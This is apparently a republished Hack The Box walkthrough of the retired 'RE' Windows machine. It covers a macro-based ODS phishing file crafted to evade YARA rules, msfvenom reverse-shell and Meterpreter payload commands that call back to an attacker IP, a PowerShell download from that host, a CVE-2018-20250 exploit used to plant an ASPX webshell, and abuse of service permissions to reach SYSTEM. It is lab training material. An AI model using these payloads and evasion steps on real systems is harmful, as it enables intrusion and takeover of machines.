RE: Hack The Box Walkthrough
source link: https://hackso.me/re-htb-walkthrough/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
This post documents the complete walkthrough of RE, a retired vulnerable VM created by 0xdf , and hosted at Hack The Box . If you are uncomfortable with spoilers, please stop reading now.
On this post
Background
RE is a retired vulnerable VM from Hack The Box.
Information Gathering
Let’s start with a masscan
probe to establish the open ports in the host.
# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.144 --rate=1000 Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2019-07-22 08:11:27 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 445/tcp on 10.10.10.144 Discovered open port 80/tcp on 10.10.10.144
masscan
finds two open ports. Let's do one better with nmap scanning the discovered ports to establish their services.
# nmap -n -v -Pn -p80,445 -A --reason -oN nmap.txt 10.10.10.144 ... PORT STATE SERVICE REASON VERSION 80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0 | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Visit reblog.htb 445/tcp open microsoft-ds? syn-ack ttl 127
Hmm. Nothing much from nmap
. But since SMB is enabled, let's see what we can discover from smbmap
.
Well, at least there's a directory malware_dropbox
we can read. Too bad it doesn’t have any files in it.
Time to check out the http
service. Here’s what is looks like.
I better put reblog.htb
into /etc/hosts
.
Looks like there's one more host to add to /etc/hosts
. And, check out the HTML source of re.htb
.
Is that a hint of privilege escalation? I've no clue how to proceed up to this point. Perhaps we can glean some insights from the blog posts?
Custom ODS and Evading Yara Detection
Two blog posts in reblog.htb
hinted about possible evasion of Yara detection with ODS phishing. One of the links pointed to the creator’s external blog, where we can catch a glimpse of the Yara rules and how we can evade detection of malicious ODS files.
In addition, this post mentions the detection of run-of-the-mill stuff, particularly powershell
and cmd.exe
. Something for us to keep in mind while creating the custom ODS.
But where is the dropbox? Recall the malware_dropbox
share? Although it says read-only, smbclient
can actually put
files into it.
I followed the steps in the creator’s blog to generate a ODS file from Metasploit and then changed the names of the subroutines and functions in LibreOffice macro editor like so.
Well, my payload dick.jar
is a reverse shell written in Java generated by msfvenom
. The box must have Java Runtime Environment (JRE) installed right, because of Kenny in IT .
# msfvenom -p java/shell_reverse_tcp LHOST=10.10.15.203 LPORT=1234 -f jar -o dick.jar Payload size: 7548 bytes Final size of jar file: 7548 bytes Saved as: dick.jar
We host the file with Python’s SimpleHTTPServer
module. Upon opening the ODS file, the macro will download the payload with certutil.exe
and write to c:\windows\tracing\dick.jar
, a place where Everyone
has write access. Next, we put
in a new ODS file to execute the reverse shell.
We should get a reverse shell if nothing goes wrong.
Sweet. The user.txt
is at luke
’s desktop.
Privilege Escalation
During enumeration of luke
's account, I noticed a scheduled task running process_samples.ps1
under luke
's privileges.
$process_dir = "C:\Users\luke\Documents\malware_process" $files_to_analyze = "C:\Users\luke\Documents\ods" $yara = "C:\Users\luke\Documents\yara64.exe" $rule = "C:\Users\luke\Documents\ods.yara" while($true) { # Get new samples move C:\Users\luke\Documents\malware_dropbox\* $process_dir # copy each ods to zip file Get-ChildItem $process_dir -Filter *.ods | Copy-Item -Destination {$_.fullname -replace ".ods", ".zip"} Get-ChildItem $process_dir -Filter *.zip | ForEach-Object { # unzip archive to get access to content $unzipdir = Join-Path $_.directory $_.Basename New-Item -Force -ItemType directory -Path $unzipdir | Out-Null Expand-Archive $_.fullname -Force -ErrorAction SilentlyContinue -DestinationPath $unzipdir # yara to look for known malware $yara_out = & $yara -r $rule $unzipdir $ods_name = $_.fullname -replace ".zip", ".ods" if ($yara_out.length -gt 0) { Remove-Item $ods_name } } # if any ods files left, make sure they launch, and then archive: $files = ls $process_dir\*.ods if ( $files.length -gt 0) { # launch ods files Invoke-Item "C:\Users\luke\Documents\malware_process\*.ods" Start-Sleep -s 5 # kill open office, sleep Stop-Process -Name soffice* Start-Sleep -s 5 #& 'C:\Program Files (x86)\WinRAR\Rar.exe' a -ep $process_dir\temp.rar $process_dir\*.ods 2>&1 | Out-Null Compress-Archive -Path "$process_dir\*.ods" -DestinationPath "$process_dir\temp.zip" $hash = (Get-FileHash -Algorithm MD5 $process_dir\temp.zip).hash # Upstream processing may expect rars. Rename to .rar Move-Item -Force -Path $process_dir\temp.zip -Destination $files_to_analyze\$hash.rar } Remove-Item -Recurse -force -Path $process_dir\* Start-Sleep -s 5 }
At the bottom of the script, there's mention of upstream processing of RAR files. I noticed any RAR file I put into C:\users\luke\Documents\ods
disappears faster than I can blink my eye while I was staring at my screen. Long story short, I was able to use EvilWinRar generator to exploit CVE-2018-20250 to write files as re/cam
. But, what files do I write and where?
Recall the web server is IIS? In C:\inetpub\wwwroot
, there are three folders blog
, ip
and re
where luke
has no write access. I can probably probably use EvilWinRar to write an ASPX webshell (from /usr/share/webshells/aspx/cmdasp.aspx
in Kali Linux) to one of the folders.
Download the webshell.rar to C:\users\luke\Documents\ods
like so.
C:\Users\luke\Documents\ods>powershell -nop -exec bypass -c iwr http://10.10.15.203:8000/webshell.rar -outfile .\webshell.rar
Bam, a webshell as IIS service.
Weak Service
I found out that accesschk.exe
was installed as part of SysInternals during my enumeration earlier on. Using accesschk.exe
, I was able to determine that NT AUTHORITY\SERVICE
has full service access to UsoSvc.
Holy cow. I can change it to run a reverse shell as SYSTEM!
I should mention that I had previously written nc.exe
to C:\inetpub\wwwroot\re
with EvilWinRar in case you are wondering how can I run a reverse shell back.
With a SYSTEM
shell, getting root.txt
should be a breeze.
Not so fast. I need to impersonate coby
. As SYSTEM
, you can be anyone you want on the machine with ease using Meterpreter and the incognito extension. First, I generate Meterpreter with msfvenom
.
# msfvenom -p windows/x64/meterpreter/reverse_tcp_rc4 LHOST=10.10.15.203 -f exe -o met.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder or badchars specified, outputting raw payload Payload size: 650 bytes Final size of exe file: 7168 bytes Saved as: met.exe
Next, stand by Metasploit’s multi-handler and wait for Meterpreter.
Launch a shell as coby
and read that root.txt
.
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK